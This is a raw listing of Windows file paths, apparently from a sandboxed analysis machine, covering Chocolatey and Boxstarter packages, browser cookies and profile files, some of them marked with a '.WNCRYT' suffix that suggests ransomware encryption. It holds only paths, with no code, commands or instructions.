C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\tools\checksum.license.txt.WNCRYT
C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt.WNCRYT
C:\ba69bdf0a250e352360c33\netfx_Full.mzz.WNCRYT
C:\Users\user\AppData\Local\Temp\0.WNCRYT
C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
C:\ba69bdf0a250e352360c33\1025\eula.rtf
C:\ba69bdf0a250e352360c33\1028\eula.rtf
C:\ba69bdf0a250e352360c33\1029\eula.rtf
C:\ba69bdf0a250e352360c33\1030\eula.rtf
C:\ba69bdf0a250e352360c33\1031\eula.rtf
C:\ba69bdf0a250e352360c33\1032\eula.rtf
C:\ba69bdf0a250e352360c33\1033\eula.rtf
C:\ba69bdf0a250e352360c33\1035\eula.rtf
C:\ba69bdf0a250e352360c33\1036\eula.rtf
C:\ba69bdf0a250e352360c33\1037\eula.rtf
C:\ba69bdf0a250e352360c33\1038\eula.rtf
C:\ba69bdf0a250e352360c33\1040\eula.rtf
C:\ba69bdf0a250e352360c33\1041\eula.rtf
C:\ba69bdf0a250e352360c33\1042\eula.rtf
C:\ba69bdf0a250e352360c33\1043\eula.rtf
C:\ba69bdf0a250e352360c33\1044\eula.rtf
C:\ba69bdf0a250e352360c33\1045\eula.rtf
C:\ba69bdf0a250e352360c33\1046\eula.rtf
C:\ba69bdf0a250e352360c33\1049\eula.rtf
C:\ba69bdf0a250e352360c33\1053\eula.rtf
C:\ba69bdf0a250e352360c33\1055\eula.rtf
C:\ba69bdf0a250e352360c33\2052\eula.rtf
C:\ba69bdf0a250e352360c33\2070\eula.rtf
C:\ba69bdf0a250e352360c33\3082\eula.rtf
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt
C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt
C:\Sysmon\sysmonconfig.txt
C:\Users\All Users\Boxstarter\LICENSE.txt
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt
C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt
C:\Users\All Users\chocolatey\CREDITS.txt
C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt
C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv
C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt
C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt
C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt
C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv
C:\Users\All Users\chocolatey\tools\7zip.license.txt
C:\Users\All Users\chocolatey\tools\shimgen.license.txt
C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
C:\BOOTSECT.BAK
C:\ba69bdf0a250e352360c33\header.bmp
C:\ba69bdf0a250e352360c33\SplashScreen.bmp
C:\ba69bdf0a250e352360c33\watermark.bmp
C:\Users\All Users\Boxstarter\BoxstarterShell.ps1
C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1
C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1
C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1
C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1
C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1
C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1
C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1
C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1
C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1
C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1
C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1
C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1
C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1
C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1
